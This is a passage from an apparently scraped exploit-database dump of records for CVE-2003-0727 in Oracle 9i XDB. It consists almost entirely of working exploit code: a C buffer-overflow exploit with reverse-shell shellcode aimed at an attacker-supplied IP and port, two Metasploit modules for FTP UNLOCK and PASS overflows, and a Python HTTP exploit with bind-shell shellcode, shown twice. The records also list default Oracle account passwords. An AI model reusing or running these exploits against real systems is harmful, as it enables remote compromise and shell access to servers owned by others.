\n#include <winsock.h> \n \nint GainControlOfOracle(char *, char *); \nint StartWinsock(void); \nint SetUpExploit(char *,int); \n \nstruct sockaddr_in s_sa; \nstruct hostent *he; \nunsigned int addr; \nchar host[260]=\"\"; \n \nunsigned char exploit[508]= \n\"\\x55\\x8B\\xEC\\xEB\\x03\\x5B\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\xBE\\xFF\\xFF\" \n\"\\xFF\\xFF\\x81\\xF6\\xDC\\xFE\\xFF\\xFF\\x03\\xDE\\x33\\xC0\\x50\\x50\\x50\\x50\" \n\"\\x50\\x50\\x50\\x50\\x50\\x50\\xFF\\xD3\\x50\\x68\\x61\\x72\\x79\\x41\\x68\\x4C\" \n\"\\x69\\x62\\x72\\x68\\x4C\\x6F\\x61\\x64\\x54\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\" \n\"\\x45\\xF0\\x83\\xC3\\x63\\x83\\xC3\\x5D\\x33\\xC9\\xB1\\x4E\\xB2\\xFF\\x30\\x13\" \n\"\\x83\\xEB\\x01\\xE2\\xF9\\x43\\x53\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\\x45\\xEC\" \n\"\\x83\\xC3\\x10\\x53\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\\x45\\xE8\\x83\\xC3\\x0C\" \n\"\\x53\\xFF\\x55\\xF0\\x89\\x45\\xF8\\x83\\xC3\\x0C\\x53\\x50\\xFF\\x55\\xF4\\x89\" \n\"\\x45\\xE4\\x83\\xC3\\x0C\\x53\\xFF\\x75\\xF8\\xFF\\x55\\xF4\\x89\\x45\\xE0\\x83\" \n\"\\xC3\\x0C\\x53\\xFF\\x75\\xF8\\xFF\\x55\\xF4\\x89\\x45\\xDC\\x83\\xC3\\x08\\x89\" \n\"\\x5D\\xD8\\x33\\xD2\\x66\\x83\\xC2\\x02\\x54\\x52\\xFF\\x55\\xE4\\x33\\xC0\\x33\" \n\"\\xC9\\x66\\xB9\\x04\\x01\\x50\\xE2\\xFD\\x89\\x45\\xD4\\x89\\x45\\xD0\\xBF\\x0A\" \n\"\\x01\\x01\\x26\\x89\\x7D\\xCC\\x40\\x40\\x89\\x45\\xC8\\x66\\xB8\\xFF\\xFF\\x66\" \n\"\\x35\\xFF\\xCA\\x66\\x89\\x45\\xCA\\x6A\\x01\\x6A\\x02\\xFF\\x55\\xE0\\x89\\x45\" \n\"\\xE0\\x6A\\x10\\x8D\\x75\\xC8\\x56\\x8B\\x5D\\xE0\\x53\\xFF\\x55\\xDC\\x83\\xC0\" \n\"\\x44\\x89\\x85\\x58\\xFF\\xFF\\xFF\\x83\\xC0\\x5E\\x83\\xC0\\x5E\\x89\\x45\\x84\" \n\"\\x89\\x5D\\x90\\x89\\x5D\\x94\\x89\\x5D\\x98\\x8D\\xBD\\x48\\xFF\\xFF\\xFF\\x57\" \n\"\\x8D\\xBD\\x58\\xFF\\xFF\\xFF\\x57\\x33\\xC0\\x50\\x50\\x50\\x83\\xC0\\x01\\x50\" \n\"\\x83\\xE8\\x01\\x50\\x50\\x8B\\x5D\\xD8\\x53\\x50\\xFF\\x55\\xEC\\xFF\\x55\\xE8\" \n\"\\x60\\x33\\xD2\\x83\\xC2\\x30\\x64\\x8B\\x02\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\" \n\"\\x8B\\x50\\x08\\x52\\x8B\\xC2\\x8B\\xF2\\x8B\\xDA\\x8B\\xCA\\x03\\x52\\x3C\\x03\" \n\"\\x42\\x78\\x03\\x58\\x1C\\x51\\x6A\\x1F\\x59\\x41\\x03\\x34\\x08\\x59\\x03\\x48\" \n\"\\x24\\x5A\\x52\\x8B\\xFA\\x03\\x3E\\x81\\x3F\\x47\\x65\\x74\\x50\\x74\\x08\\x83\" \n\"\\xC6\\x04\\x83\\xC1\\x02\\xEB\\xEC\\x83\\xC7\\x04\\x81\\x3F\\x72\\x6F\\x63\\x41\" \n\"\\x74\\x08\\x83\\xC6\\x04\\x83\\xC1\\x02\\xEB\\xD9\\x8B\\xFA\\x0F\\xB7\\x01\\x03\" \n\"\\x3C\\x83\\x89\\x7C\\x24\\x44\\x8B\\x3C\\x24\\x89\\x7C\\x24\\x4C\\x5F\\x61\\xC3\" \n\"\\x90\\x90\\x90\\xBC\\x8D\\x9A\\x9E\\x8B\\x9A\\xAF\\x8D\\x90\\x9C\\x9A\\x8C\\x8C\" \n\"\\xBE\\xFF\\xFF\\xBA\\x87\\x96\\x8B\\xAB\\x97\\x8D\\x9A\\x9E\\x9B\\xFF\\xFF\\xA8\" \n\"\\x8C\\xCD\\xA0\\xCC\\xCD\\xD1\\x9B\\x93\\x93\\xFF\\xFF\\xA8\\xAC\\xBE\\xAC\\x8B\" \n\"\\x9E\\x8D\\x8B\\x8A\\x8F\\xFF\\xFF\\xA8\\xAC\\xBE\\xAC\\x90\\x9C\\x94\\x9A\\x8B\" \n\"\\xBE\\xFF\\xFF\\x9C\\x90\\x91\\x91\\x9A\\x9C\\x8B\\xFF\\x9C\\x92\\x9B\\xFF\\xFF\" \n\"\\xFF\\xFF\\xFF\\xFF\"; \n \nchar exploit_code[8000]= \n\"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn\" \n\"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD\" \n\"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST\" \n\"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK\" \n\"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432\" \n\"1aaaabbbbcc\"; \n \n \nchar exception_handler[8]=\"\\x79\\x9B\\xf7\\x77\"; \nchar short_jump[8]=\"\\xEB\\x06\\x90\\x90\"; \n \n \nint main(int argc, char *argv[]) \n{ \nif(argc != 6) \n{ \nprintf(\"\\n\\n\\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit\"); \nprintf(\"\\n\\t\\tfor Blackhat (http://www.blackhat.com)\"); \nprintf(\"\\n\\n\\tSpawns a reverse shell to specified port\"); \nprintf(\"\\n\\n\\tUsage:\\t%s host userid password ipaddress port\",argv[0]); \nprintf(\"\\n\\n\\tDavid Litchfield\\n\\t(david@ngssoftware.com)\"); \nprintf(\"\\n\\t6th July 2003\\n\\n\\n\"); \nreturn 0; \n} \nstrncpy(host,argv[1],250); \nif(StartWinsock()==0) \nreturn printf(\"Error starting Winsock.\\n\"); \nSetUpExploit(argv[4],atoi(argv[5])); \nstrcat(exploit_code,short_jump); \nstrcat(exploit_code,exception_handler); \nstrcat(exploit_code,exploit); \nstrcat(exploit_code,\"\\r\\n\"); \n \n \nGainControlOfOracle(argv[2],argv[3]); \nreturn 0; \n} \n \n \nint SetUpExploit(char *myip, int myport) \n{ \nunsigned int ip=0; \nunsigned short prt=0; \nchar *ipt=\"\"; \nchar *prtt=\"\"; \n \n \nip = inet_addr(myip); \nipt = (char*)&ip; \nexploit[191]=ipt[0]; \nexploit[192]=ipt[1]; \nexploit[193]=ipt[2]; \nexploit[194]=ipt[3]; \n// set the TCP port to connect on \n// netcat should be listening on this port \n// e.g. nc -l -p 80 \n \nprt = htons((unsigned short)myport); \nprt = prt ^ 0xFFFF; \nprtt = (char *) &prt; \nexploit[209]=prtt[0]; \nexploit[210]=prtt[1]; \nreturn 0; \n} \n \n \nint StartWinsock() { \nint err=0; WORD wVersionRequested; \nWSADATA wsaData; \nwVersionRequested = MAKEWORD( 2, 0 ); \nerr = WSAStartup( wVersionRequested, &wsaData ); \nif ( err != 0 ) \nreturn 0; \n \nif ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) \n{ WSACleanup( ); \nreturn 0; } \n \n \nif (isalpha(host[0])) { \nhe = gethostbyname(host); \ns_sa.sin_addr.s_addr=INADDR_ANY; \ns_sa.sin_family=AF_INET; \nmemcpy(&s_sa.sin_addr,he->h_addr,he->h_length); \n} else \n{ addr = inet_addr(host); \ns_sa.sin_addr.s_addr=INADDR_ANY; \ns_sa.sin_family=AF_INET; \nmemcpy(&s_sa.sin_addr,&addr,4); \nhe = (struct hostent *)1; \n} \nif (he == NULL) { \nreturn 0; } \nreturn 1; } \n \n \nint GainControlOfOracle(char *user, char *pass) { \nchar usercmd[260]=\"user \"; \nchar passcmd[260]=\"pass \"; \nchar resp[1600]=\"\"; \nint snd=0,rcv=0; \nstruct sockaddr_in r_addr; \nSOCKET sock; \n \n \nstrncat(usercmd,user,230); \nstrcat(usercmd,\"\\r\\n\"); \nstrncat(passcmd,pass,230); \nstrcat(passcmd,\"\\r\\n\"); \n \n \nsock=socket(AF_INET,SOCK_STREAM,0); \nif (sock==INVALID_SOCKET) \nreturn printf(\" sock error\"); \nr_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; \nr_addr.sin_port=htons((unsigned short)0); \n \ns_sa.sin_port=htons((unsigned short)2100); \nif (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf(\"Connect error\"); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); \nZeroMemory(resp,1600); \nsnd=send(sock, usercmd , strlen(usercmd) , 0); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); ZeroMemory(resp,1600); \n \n \nsnd=send(sock, passcmd , strlen(passcmd) , 0); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); \nif(resp[0]=='5') \n{ closesocket(sock); \nreturn printf(\"Failed to log in using user %s and password %s.\\n\",user,pass); \n} \nZeroMemory(resp,1600); \nsnd=send(sock, exploit_code, strlen(exploit_code) , 0); \nSleep(2000); \nclosesocket(sock); \nreturn 0; \n} \n \n// milw0rm.com [2003-08-13] \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144108/oraclexdbftp-overflow.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:17:10", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82958", "href": "https://packetstormsecurity.com/files/82958/Oracle-9i-XDB-FTP-UNLOCK-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)', \n'Description' => %q{ \nBy passing an overly long token to the UNLOCK command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. Oracle9i includes a number of default accounts, \nincluding dbsnmp:dbsmp, scott:tiger, system:manager, and \nsys:change_on_install. \n \n}, \n'Author' => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0727'], \n[ 'OSVDB', '2449'], \n[ 'BID', '8375'], \n[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n \n}, \n'Targets' => \n[ \n[ \n'Oracle 9.2.0.1 Universal', \n{ \n'Platform' => 'win', \n'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) \n}, \n], \n], \n'DisclosureDate' => 'Aug 18 2003', \n'DefaultTarget' => 0)) \n \nregister_options( [ \nOpt::RPORT(2100), \nOptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), \nOptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), \n], self.class ) \nend \n \ndef check \nconnect \ndisconnect \nif (banner =~ /9\\.2\\.0\\.1\\.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_login \n \nprint_status(\"Trying target #{target.name}...\") \n \nbuf = rand_text_english(1130, payload_badchars) \nseh = generate_seh_payload(target.ret) \nbuf[322, seh.length] = seh \n \nsend_cmd( ['UNLOCK', '/', buf] , false ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82958/oracle9i_xdb_ftp_unlock.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-26T18:00:43", "description": "", "cvss3": {}, "published": "2017-09-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-26T00:00:00", "id": "PACKETSTORM:144341", "href": "https://packetstormsecurity.com/files/144341/Oracle-9i-XDB-9.2.01-HTTP-PASS-Buffer-Overflow.html", "sourceData": "`#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow \n#Date: 09/25/2017 \n#Exploit Author: Charles Dardaman \n#Twitter: https://twitter.com/CharlesDardaman \n#Website: http://www.dardaman.com \n#Version:9.2.0.1 \n#Tested on: Windows 2000 SP4 \n#CVE: 2003-0727 \n#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/ \n \n#!/usr/bin/python \n \n \nimport socket, sys, base64 \n \n#usage ./oracle9i_xbd_pass <target ip> <target port> \n \nrhost = sys.argv[1] #target ip \nrport = int(sys.argv[2]) #target port \n \n#Variables: \nret = \"\\x46\\x6d\\x61\\x60\" #0x60616d46 Little endian form \nnop = \"\\x90\" \npre = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #This has to be prepended into the shellcode. \n \n#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b \"\\x00\" -e x86/shikata_ga_nai \n#355 bytes \npayload = \"\" \npayload += pre \npayload += \"\\xba\\x64\\xdb\\x93\\xe7\\xda\\xd6\\xd9\\x74\\x24\\xf4\\x58\\x29\" \npayload += \"\\xc9\\xb1\\x53\\x31\\x50\\x12\\x83\\xc0\\x04\\x03\\x34\\xd5\\x71\" \npayload += \"\\x12\\x48\\x01\\xf7\\xdd\\xb0\\xd2\\x98\\x54\\x55\\xe3\\x98\\x03\" \npayload += \"\\x1e\\x54\\x29\\x47\\x72\\x59\\xc2\\x05\\x66\\xea\\xa6\\x81\\x89\" \npayload += \"\\x5b\\x0c\\xf4\\xa4\\x5c\\x3d\\xc4\\xa7\\xde\\x3c\\x19\\x07\\xde\" \npayload += \"\\x8e\\x6c\\x46\\x27\\xf2\\x9d\\x1a\\xf0\\x78\\x33\\x8a\\x75\\x34\" \npayload += \"\\x88\\x21\\xc5\\xd8\\x88\\xd6\\x9e\\xdb\\xb9\\x49\\x94\\x85\\x19\" \npayload += \"\\x68\\x79\\xbe\\x13\\x72\\x9e\\xfb\\xea\\x09\\x54\\x77\\xed\\xdb\" \npayload += \"\\xa4\\x78\\x42\\x22\\x09\\x8b\\x9a\\x63\\xae\\x74\\xe9\\x9d\\xcc\" \npayload += \"\\x09\\xea\\x5a\\xae\\xd5\\x7f\\x78\\x08\\x9d\\xd8\\xa4\\xa8\\x72\" \npayload += \"\\xbe\\x2f\\xa6\\x3f\\xb4\\x77\\xab\\xbe\\x19\\x0c\\xd7\\x4b\\x9c\" \npayload += \"\\xc2\\x51\\x0f\\xbb\\xc6\\x3a\\xcb\\xa2\\x5f\\xe7\\xba\\xdb\\xbf\" \npayload += \"\\x48\\x62\\x7e\\xb4\\x65\\x77\\xf3\\x97\\xe1\\xb4\\x3e\\x27\\xf2\" \npayload += \"\\xd2\\x49\\x54\\xc0\\x7d\\xe2\\xf2\\x68\\xf5\\x2c\\x05\\x8e\\x2c\" \npayload += \"\\x88\\x99\\x71\\xcf\\xe9\\xb0\\xb5\\x9b\\xb9\\xaa\\x1c\\xa4\\x51\" \npayload += \"\\x2a\\xa0\\x71\\xcf\\x22\\x07\\x2a\\xf2\\xcf\\xf7\\x9a\\xb2\\x7f\" \npayload += \"\\x90\\xf0\\x3c\\xa0\\x80\\xfa\\x96\\xc9\\x29\\x07\\x19\\xd2\\xac\" \npayload += \"\\x8e\\xff\\x76\\xbf\\xc6\\xa8\\xee\\x7d\\x3d\\x61\\x89\\x7e\\x17\" \npayload += \"\\xd9\\x3d\\x36\\x71\\xde\\x42\\xc7\\x57\\x48\\xd4\\x4c\\xb4\\x4c\" \npayload += \"\\xc5\\x52\\x91\\xe4\\x92\\xc5\\x6f\\x65\\xd1\\x74\\x6f\\xac\\x81\" \npayload += \"\\x15\\xe2\\x2b\\x51\\x53\\x1f\\xe4\\x06\\x34\\xd1\\xfd\\xc2\\xa8\" \npayload += \"\\x48\\x54\\xf0\\x30\\x0c\\x9f\\xb0\\xee\\xed\\x1e\\x39\\x62\\x49\" \npayload += \"\\x05\\x29\\xba\\x52\\x01\\x1d\\x12\\x05\\xdf\\xcb\\xd4\\xff\\x91\" \npayload += \"\\xa5\\x8e\\xac\\x7b\\x21\\x56\\x9f\\xbb\\x37\\x57\\xca\\x4d\\xd7\" \npayload += \"\\xe6\\xa3\\x0b\\xe8\\xc7\\x23\\x9c\\x91\\x35\\xd4\\x63\\x48\\xfe\" \npayload += \"\\xf4\\x81\\x58\\x0b\\x9d\\x1f\\x09\\xb6\\xc0\\x9f\\xe4\\xf5\\xfc\" \npayload += \"\\x23\\x0c\\x86\\xfa\\x3c\\x65\\x83\\x47\\xfb\\x96\\xf9\\xd8\\x6e\" \npayload += \"\\x98\\xae\\xd9\\xba\" \n \n \n \nexploit = \"AAAA:\" + \"B\"*442 + \"\\xeb\\x64\" + (nop*2) + ret + (nop*266) +\"\\xeb\\x10\" + (nop*109) + payload + (nop * (400-len(payload))) \n \n \nrequest = \"GET / HTTP/1.1\\r\\n\" + \"Host: \" + rhost + \":\" + str(rport) + \"\\r\\n\" + \"Authorization: Basic \" + base64.b64encode(exploit) + \"\\r\\n\\r\\n\" \n \nprint (\"Attacking \" + rhost + \":\" + str(rport)) \n \n#Connect to the target \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((rhost,rport)) \n#Send exploit \ns.send(request) \ns.close() \n \nprint (\"Try to connect on port 9989.\") \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144341/oracle9ixdb-overflow.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:00", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83144", "href": "https://packetstormsecurity.com/files/83144/Oracle-9i-XDB-FTP-PASS-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)', \n'Description' => %q{ \nBy passing an overly long string to the PASS command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. \n \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0727'], \n[ 'OSVDB', '2449'], \n[ 'BID', '8375'], \n[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Targets' => \n[ \n[ \n'Oracle 9.2.0.1 Universal', \n{ \n'Platform' => 'win', \n'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) \n}, \n], \n], \n'DisclosureDate' => 'Aug 18 2003', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(2100),], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \n \nend \n \n \ndef check \nconnect \ndisconnect \nif (banner =~ /9\\.2\\.0\\.1\\.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nuser = rand_text_alpha_upper(10) \nsploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) \nsploit << make_nops(2) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_cmd( ['USER', user], true ) \nsend_cmd( ['PASS', sploit], false ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83144/oracle9i_xdb_ftp_pass.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-02T03:36:46", "description": "Oracle 9i XDB version 9.2.0.1 HTTP PASS buffer overflow exploit.", "cvss3": {}, "published": "2017-09-26T00:00:00", "type": "zdt", "title": "Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-26T00:00:00", "id": "1337DAY-ID-28634", "href": "https://0day.today/exploit/description/28634", "sourceData": "#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow\r\n#Date: 09/25/2017\r\n#Exploit Author: Charles Dardaman\r\n#Twitter: https://twitter.com/CharlesDardaman\r\n#Website: http://www.dardaman.com\r\n#Version:9.2.0.1\r\n#Tested on: Windows 2000 SP4\r\n#CVE: 2003-0727\r\n#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/\r\n \r\n#!/usr/bin/python\r\n \r\n \r\nimport socket, sys, base64\r\n \r\n#usage ./oracle9i_xbd_pass <target ip> <target port>\r\n \r\nrhost = sys.argv[1] #target ip\r\nrport = int(sys.argv[2]) #target port\r\n \r\n#Variables:\r\nret = \"\\x46\\x6d\\x61\\x60\" #0x60616d46 Little endian form\r\nnop = \"\\x90\"\r\npre = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #This has to be prepended into the shellcode.\r\n \r\n#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b \"\\x00\" -e x86/shikata_ga_nai\r\n#355 bytes\r\npayload = \"\"\r\npayload += pre\r\npayload += \"\\xba\\x64\\xdb\\x93\\xe7\\xda\\xd6\\xd9\\x74\\x24\\xf4\\x58\\x29\"\r\npayload += \"\\xc9\\xb1\\x53\\x31\\x50\\x12\\x83\\xc0\\x04\\x03\\x34\\xd5\\x71\"\r\npayload += \"\\x12\\x48\\x01\\xf7\\xdd\\xb0\\xd2\\x98\\x54\\x55\\xe3\\x98\\x03\"\r\npayload += \"\\x1e\\x54\\x29\\x47\\x72\\x59\\xc2\\x05\\x66\\xea\\xa6\\x81\\x89\"\r\npayload += \"\\x5b\\x0c\\xf4\\xa4\\x5c\\x3d\\xc4\\xa7\\xde\\x3c\\x19\\x07\\xde\"\r\npayload += \"\\x8e\\x6c\\x46\\x27\\xf2\\x9d\\x1a\\xf0\\x78\\x33\\x8a\\x75\\x34\"\r\npayload += \"\\x88\\x21\\xc5\\xd8\\x88\\xd6\\x9e\\xdb\\xb9\\x49\\x94\\x85\\x19\"\r\npayload += \"\\x68\\x79\\xbe\\x13\\x72\\x9e\\xfb\\xea\\x09\\x54\\x77\\xed\\xdb\"\r\npayload += \"\\xa4\\x78\\x42\\x22\\x09\\x8b\\x9a\\x63\\xae\\x74\\xe9\\x9d\\xcc\"\r\npayload += \"\\x09\\xea\\x5a\\xae\\xd5\\x7f\\x78\\x08\\x9d\\xd8\\xa4\\xa8\\x72\"\r\npayload += \"\\xbe\\x2f\\xa6\\x3f\\xb4\\x77\\xab\\xbe\\x19\\x0c\\xd7\\x4b\\x9c\"\r\npayload += \"\\xc2\\x51\\x0f\\xbb\\xc6\\x3a\\xcb\\xa2\\x5f\\xe7\\xba\\xdb\\xbf\"\r\npayload += \"\\x48\\x62\\x7e\\xb4\\x65\\x77\\xf3\\x97\\xe1\\xb4\\x3e\\x27\\xf2\"\r\npayload += \"\\xd2\\x49\\x54\\xc0\\x7d\\xe2\\xf2\\x68\\xf5\\x2c\\x05\\x8e\\x2c\"\r\npayload += \"\\x88\\x99\\x71\\xcf\\xe9\\xb0\\xb5\\x9b\\xb9\\xaa\\x1c\\xa4\\x51\"\r\npayload += \"\\x2a\\xa0\\x71\\xcf\\x22\\x07\\x2a\\xf2\\xcf\\xf7\\x9a\\xb2\\x7f\"\r\npayload += \"\\x90\\xf0\\x3c\\xa0\\x80\\xfa\\x96\\xc9\\x29\\x07\\x19\\xd2\\xac\"\r\npayload += \"\\x8e\\xff\\x76\\xbf\\xc6\\xa8\\xee\\x7d\\x3d\\x61\\x89\\x7e\\x17\"\r\npayload += \"\\xd9\\x3d\\x36\\x71\\xde\\x42\\xc7\\x57\\x48\\xd4\\x4c\\xb4\\x4c\"\r\npayload += \"\\xc5\\x52\\x91\\xe4\\x92\\xc5\\x6f\\x65\\xd1\\x74\\x6f\\xac\\x81\"\r\npayload += \"\\x15\\xe2\\x2b\\x51\\x53\\x1f\\xe4\\x06\\x34\\xd1\\xfd\\xc2\\xa8\"\r\npayload += \"\\x48\\x54\\xf0\\x30\\x0c\\x9f\\xb0\\xee\\xed\\x1e\\x39\\x62\\x49\"\r\npayload += \"\\x05\\x29\\xba\\x52\\x01\\x1d\\x12\\x05\\xdf\\xcb\\xd4\\xff\\x91\"\r\npayload += \"\\xa5\\x8e\\xac\\x7b\\x21\\x56\\x9f\\xbb\\x37\\x57\\xca\\x4d\\xd7\"\r\npayload += \"\\xe6\\xa3\\x0b\\xe8\\xc7\\x23\\x9c\\x91\\x35\\xd4\\x63\\x48\\xfe\"\r\npayload += \"\\xf4\\x81\\x58\\x0b\\x9d\\x1f\\x09\\xb6\\xc0\\x9f\\xe4\\xf5\\xfc\"\r\npayload += \"\\x23\\x0c\\x86\\xfa\\x3c\\x65\\x83\\x47\\xfb\\x96\\xf9\\xd8\\x6e\"\r\npayload += \"\\x98\\xae\\xd9\\xba\"\r\n \r\n \r\n \r\nexploit = \"AAAA:\" + \"B\"*442 + \"\\xeb\\x64\" + (nop*2) + ret + (nop*266) +\"\\xeb\\x10\" + (nop*109) + payload + (nop * (400-len(payload)))\r\n \r\n \r\nrequest = \"GET / HTTP/1.1\\r\\n\" + \"Host: \" + rhost + \":\" + str(rport) + \"\\r\\n\" + \"Authorization: Basic \" + base64.b64encode(exploit) + \"\\r\\n\\r\\n\"\r\n \r\nprint (\"Attacking \" + rhost + \":\" + str(rport))\r\n \r\n#Connect to the target\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((rhost,rport))\r\n#Send exploit\r\ns.send(request)\r\ns.close()\r\n \r\nprint (\"Try to connect on port 9989.\")\n\n# 0day.today [2018-03-02] #", "sourceHref": "https://0day.today/exploit/28634", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-07-02T22:48:16", "description": "This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference.\n", "edition": 2, "cvss3": {}, "published": "2006-10-26T13:17:43", "type": "metasploit", "title": "Oracle 9i XDB HTTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": 